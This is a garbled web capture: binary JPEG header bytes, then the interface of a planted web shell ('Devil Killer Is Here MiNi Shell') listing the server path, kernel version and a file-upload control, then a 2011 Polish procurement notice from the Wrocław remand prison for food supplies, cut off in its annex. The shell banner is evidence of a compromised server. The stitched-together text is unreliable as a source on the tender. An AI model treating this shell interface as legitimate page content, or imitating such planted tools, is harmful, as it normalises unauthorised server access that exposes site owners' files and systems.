JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110511/109860-N-2011.html

<p class="kh_header"><b>Wrocław: D/Kw-220/63/11 Różne artykuły żywnościowe</b><br>
<b>Numer ogłoszenia: 109860 - 2011; data zamieszczenia: 11.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy we Wrocławiu , ul. Świebodzka 1, 50-950 Wrocław, woj. dolnośląskie, tel. 071 3272400, 3272502, faks 071 3436610.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednnostka sektora finansów publicznych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> D/Kw-220/63/11 Różne artykuły żywnościowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są sukcesywne dostawy artykułów żywnościowych do Aresztu Śledczego we Wrocławiu w ilościach i asortymencie podanym poniżej, który stanowi jednocześnie kolejne części zamówienia.
2.Zamówienie podzielone zostało na 14 części:

Część I Przyprawy
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Bazylia (kod CPV 15870000-7) jakościowo odpowiadająca Polskiej Normie PN-A-86959:1997/Az1:2002. W ilości 4 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 2 kg. 
2.Cynamon mielony - (kod CPV 15870000-7) BN-68/8132-09. W ilości 5 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 2 kg.  
3.Czosnek mielony - (kod CPV 15870000-7) W ilości 35 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 15 kg. 
4.Kminek - (kod CPV 15870000-7) jakościowo odpowiadający Polskiej Normie PN-A-86953:1997/Az1:2002 W ilości 20 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 10 kg. 
5.Koperek mielony suszony - (kod CPV 15870000-7)  jakościowo odpowiadający Polskiej Normie PN-72/A-77603 W ilości 45 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 10 kg. 
6.Liść laurowy - (kod CPV 15870000-7) BN-67/3132-10 W ilości 7 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 4 kg. 
7.Majeranek - (kod CPV 15870000-7) jakościowo odpowiadający Polskiej Normie Nr PN-A-86958:1997/Az1:2002 W ilości 17 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 6 kg. 
1.Ocet - (kod CPV 15871110-8) jakościowo odpowiadający Polskiej Normie Nr PN-EN13188:2002 W ilości 230 l. Opakowanie jednostkowe do 0,5 l. Wielkość jednorazowej dostawy do 60 l. 
2.Oregano suszone mielone - (kod CPV 15870000-7) jakościowo odpowiadający Polskiej Normie Nr PN-A-86967. W ilości 4 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 1 kg. 
3.Papryka suszona mielona ostra - (kod CPV 15870000-7) jakościowo odpowiadający Polskiej Normie Nr PN-A-86955:1997/Az1:2002 W ilości 35 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 20 kg. 
4.Pieprz naturalny czarny mielony (kod CPV 15872100-2) jakościowo odpowiadający PN-A-86965:1997/Az1:2002 W ilości 70 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 20 kg. 
5.Sól spożywcza - (kod CPV 15872400-5) jakościowo odpowiadająca PN-C-84081-2:1998 W ilości 1500 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 400 kg. 
6.Ziele angielskie suszone mielone - (kod CPV 15870000-7) zgodny z normą BN-64/8132-14 W ilości 4 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 2 kg.
7.Hydrolizat białkowy - przyprawa w płynie typu Magi (kod CPV 15870000-7) jakościowo odpowiadająca Polskiej Normie PN-A-94052:1996 w ilości do 1300 l. Opakowanie jednostkowe 5 l. Wielkość jednorazowej dostawy do 400 l. 

Część II Buliony
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Bulion jarzynowy w proszku - (kod CPV 15891500-5) jakościowo odpowiadający Polskiej Normie Nr PN-A-94052. W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg. 
2.Bulion z kury w proszku - (kod CPV 15891500-5) jakościowo odpowiadający Polskiej Normie Nr PN-A-94052. W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg. 
3.Sos biały w proszku - kod (CPV 15871260-4) W ilości 200 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 50 kg. 
4.Sos myśliwski w proszku - (kod CPV 15871260-4) jakościowo odpowiadający Polskiej Normie PN-A-86951:1997 W ilości 200 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 50 kg. 
5.Sos pieczeniowy w proszku - (kod CPV 15871260-4) jakościowo odpowiadający Polskiej Normie PN-A-86951:1997 W ilości 200 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 50 kg. 
6.Zupa grzybowa w proszku - (kod CPV 15891400-4) jakościowo odpowiadający Polskiej Normie PN-A-94050 W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg. 
7.Zupa pieczarkowa w proszku - (kod CPV 15891400-4) jakościowo odpowiadający Polskiej Normie PN-A-94050 W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg. 
8.Zupa żurek w proszku - (kod CPV 15891400-4) jakościowo odpowiadający Polskiej Normie PN-A-94050 W ilości 130 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 40 kg. 

Część III Wafle ryżowe
Dostawy 1 - 3 razy na kwartał.
1.Wafle ryżowe - (kod CPV 15820000-2) W ilości 150 kg. Opakowanie jednostkowe do 200 g. Wielkość jednorazowej dostawy do 50 kg. 

Część IV Mąka ziemnieczana
Dostawy 1 - 3 razy na kwartał.
1.Mąka ziemniaczana - (kod CPV 15620000-0) jakościowo odpowiadająca Polskiej Normie PN-A-74710 W ilości 110g. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 40 kg.

Część V Dodatki 
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Chrzan tarty z kwaskiem cytrynowym - (kod CPV 15331400-1) jakościowo odpowiadający Polskiej Normie Nr PN-A-77806. W ilości 150 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 50 kg.
2.Majonez - (kod CPV 15871273-8) jakościowo odpowiadający Polskiej Normie Nr PN-A-86950:1995/Ap1:2000 W ilości 90 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 50 kg.
3.Musztarda - (kod CPV 15871250-1) jakościowo odpowiadający Polskiej Normie Nr PN-A- 86964:2002/Az1:2004 W ilości 150 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 50 kg.
4.Keczup - (kod CPV 15871230-5) jakościowo odpowiadający Polskiej Normie Nr PN-A-86951:1997. W ilości 100 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 50 kg. 
5.Koncentrat pomidorowy 30% (kod CPV - 15331427-6) jakościowo odpowiadający Polskiej Normie Nr PN-A-77601:1975. W ilości 1200 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 400 kg.

Część VI Fasola szparagowa konserwowa i groch konserwowy
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Fasola szparagowa konserwowa - (kod CPV 15331463-0) jakościowo odpowiadający Polskiej Normie Nr PN-76/A-77802. W ilości 450 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 300 kg. (Masa netto fasolki szparagowej po odsączeniu nie mniejsza niż 50 % całkowitej masy netto produktu).
2.Groch konserwowy - (kod CPV 15331462-3) jakościowo odpowiadający Polskiej Normie Nr PN-A-77805. W ilości 500 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 200 kg. (Masa netto groszku po odsączeniu nie mniejsza niż 50 % całkowitej masy netto produktu).

Część VII Herbaty i kawa
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Herbata czarna granulowana luzem - (kod CPV 15863200-7) jakościowo odpowiadająca Polskiej Normie Nr PN-ISO 3720. W ilości 450 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 150 kg.
2.Herbata miętowa - (kod CPV 15860000-4). W ilości 100 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 100 kg.  
3.Kawa zbożowa - (kod CPV 15860000-4) lub 15862000-8  jakościowo odpowiadająca Polskiej Normie Nr PN-V-74029:2006. W ilości 200 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 100 kg. 

Część VIII Woda mineralna
Dostawy 1 - 3 razy na kwartał.
1.Woda mineralna (gazowana i/lub niegazowana wg wskazania zamawiającego) - (kod CPV 15981000-8) jakościowo odpowiadająca Polskiej Normie Nr PN-Z-11001-2. W ilości 15 000 l. Opakowanie jednostkowe do 2 l. Wielkość jednorazowej dostawy do 4000 l.

Część IX Konserwy rybne
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
Konserwy wyposażone w otwieracz
Pojedyncza dostawa pochodząca z jednej partii produkcyjnej
1.Konserwa rybna w oleju (kod CPV 15.24.00.00-2) W ilości 800 kg. Opakowanie jednostkowe puszka/alupak 290 - 330 g. Wielkość jednorazowej dostawy do 300 kg
2.Konserwa rybna w pomidorach (kod CPV 15.24.00.00-2) W ilości 800 kg. Opakowanie jednostkowe puszka/alupak 290 - 330 g. Wielkość jednorazowej dostawy do 300 kg.
3.Paprykarz szczecińska (kod CPV 15.24.00.00-2) W ilości 1700 kg. Opakowanie jednostkowe puszka/alupak 290 - 330 g. Wielkość jednorazowej dostawy do 300 kg.

Część X Ryby
Dostawy 1 - 4 razy w miesiącu w wybrane przez Zamawiającego poniedziałki i czwartki.
Zamówienie składane na 2 dni przed dostawą. 
Dostawa może obejmować pojedynczy asortyment z danej części.
Do każdej dostawy Wykonawca dołączy handlowy dokument identyfikacyjny HDI
1.Tusza z dorsza odgłowiona, bez glazury, mrożona (kod CPV 15220000-6). Jakościowo odpowiadająca Polskiej Normie PN-A-86759:1994. W ilości 290 kg. Wielkość jednorazowej dostawy podawanej przez Zamawiającego od 5 do 25 kg, realizowanej z dokładnością do 1 kg. 
2.Kotlety - Burgery rybne, panierowane, mrożone (kod CPV 15241700-6). Jakościowo odpowiadający Polskiej Normie PN-A-86769:1997. W ilości 1600 kg. Opakowanie jednostkowe do 5 kg. Wielkość jednorazowej dostawy do 220 kg.

Część XI Jaja spożywcze
Dostawa raz w tygodniu w uzgodnionym z Zamawiającym dniu.
Termin przydatności do użycia liczony od dnia zrealizowania dostawy minimum 10 dni.
Jednorazowa dostawa ok 2160 sztuk, w wybrane przez zamawiającego dni ok 3240 sztuk.
W okresie świątecznym ilości oraz terminy dostaw ustalane każdorazowo indywidualnie jednakże odstęp między kolejnymi dostawami nie będzie przekraczał 10 dni.
1.Jaja spożywcze PN-A-86503 Klasy jakościowej A, kategorii wagowej M, w ilości 86 400 szt. (kod CPV 03142500-3)

Część XII Produkty sojowe
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Kotlety sojowe (kod CPV: 15.89.00.00-3), PN-ISO 5506:2002 W ilości 450 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 300 kg.
2.Kostka sojowa (kod CPV: 15.89.00.00-3), PN-ISO 5506:2002 W ilości 850 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 300 kg.
3.Granulat sojowy (kod CPV: 15.89.00.00-3), PN-ISO 5506:2002 W ilości 700 kg. Opakowanie jednostkowe do 20 kg. Wielkość jednorazowej dostawy do 400 kg.

Część XIII Dżemy
Dżemy wysokosłodzone, klasy II
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Dżem truskawkowy PN-A-75100:1994/ Az1:2000 (kod CPV15332296- 5) W ilości 1 300 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 500 kg.
2.Dżem wiśniowy PN-A-75100:1994/ Az1:2000 (kod CPV15332291- 4) W ilości 1 300 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 500 kg.
3.Dżem czarna porzeczka PN-A-75100:1994/ Az1:2000 (kod CPV15332293- 4) W ilości 1 300 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 500 kg.
4.Dżem śliwkowy PN-A-75100:1994/ Az1:2000 (kod CPV15332290- 3) W ilości 400 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 200 kg.

Część XIV Zupa szczawiowa
Dostawy 1 - 3 razy na kwartał.
1. Zupa szczawiowa przecier - (kod CPV 15891400-4) jakościowo odpowiadający Polskiej Normie Nr PN-A-77807 W ilości 300 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 200 kg..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 15.87.00.00-7, 15.87.21.00-2, 15.87.24.00-5, 15.89.15.00-5, 15.87.12.60-4, 15.82.00.00-2, 15.62.00.00-0, 15.33.14.00-1, 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.33.14.27-6, 15.33.14.63-0, 15.33.14.62-3, 15.86.32.00-7, 15.86.00.00-4, 15.98.10.00-8, 15.24.00.00-2, 15.22.00.00-6, 15.24.17.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpisu z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 22 ust. 1 oraz braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 22 ust. 1 oraz braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 22 ust. 1 oraz braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 22 ust. 1 oraz braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy we Wrocławiu, ul. Świebodzka 1, 50-046 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2011 godzina 11:30, miejsce: Sekretariat Aresztu Śledczego we Wrocławiu, ul. Świebodzka 1, 50-046 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I Przyprawy
Dostawy 1 - 3 razy na kwartał, dostawa może obejmować pojedynczy asortyment z danej części.
1.Bazylia (kod CPV 15870000-7) jakościowo odpowiadająca Polskiej Normie PN-A-86959:1997/Az1:2002. W ilości 4 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 2 kg. 
2.Cynamon mielony - (kod CPV 15870000-7) BN-68/8132-09. W ilości 5 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 2 kg.  
3.Czosnek mielony - (kod CPV 15870000-7) W ilości 35 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 15 kg. 
4.Kminek - (kod CPV 15870000-7) jakościowo odpowiadający Polskiej Normie PN-A-86953:1997/Az1:2002 W ilości 20 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 10 kg. 
5.Koperek mielony suszony - (kod CPV 15870000-7)  jakościowo odpowiadający Polskiej Normie PN-72/A-77603 W ilości 45 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 10 kg. 
6.Liść laurowy - (kod CPV 15870000-7) BN-67/3132-10 W ilości 7 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 4 kg. 
7.Majeranek - (kod CPV 15870000-7) jakościowo odpowiadający Polskiej Normie Nr PN-A-86958:1997/Az1:2002 W ilości 17 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 6 kg. 
1.Ocet - (kod CPV 15871110-8) jakościowo odpowiadający Polskiej Normie Nr PN-EN13188:2002 W ilości 230 l. Opakowanie jednostkowe do 0,5 l. Wielkość jednorazowej dostawy do 60 l. 
2.Oregano suszone mielone - (kod CPV 15870000-7) jakościowo odpowiadający Polskiej Normie Nr PN-A-86967. W ilości 4 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 1 kg. 
3.Papryka suszona mielona ostra - (kod CPV 15870000-7) jakościowo odpowiadający Polskiej Normie Nr PN-A-86955:1997/Az1:2002 W ilości 35 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 20 kg. 
4.Pieprz naturalny czarny mielony (kod CPV 15872100-2) jakościowo odpowiadający PN-A-86965:1997/Az1:2002 W ilości 70 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 20 kg. 
5.Sól spożywcza - (kod CPV 15872400-5) jakościowo odpowiadająca PN-C-84081-2:1998 W ilości 1500 kg. Opakowanie jednostkowe do 10 kg. Wielkość jednorazowej dostawy do 400 kg. 
6.Ziele angielskie suszone mielone - (kod CPV 15870000-7) zgodny z normą BN-64/8132-14 W ilości 4 kg. Opakowanie jednostkowe do 1 kg. Wielkość jednorazowej dostawy do 2 kg.
7.Hydrolizat białkowy - przyprawa w płynie typu Magi (kod CPV 15870000-7) jakościowo odpowiadająca Polskiej Normie PN-A-94052:1996 w ilości do 1300 l. Opakowanie jednostkowe 5 l. Wielkość jednorazowej dostawy do 400 l..</p></li>
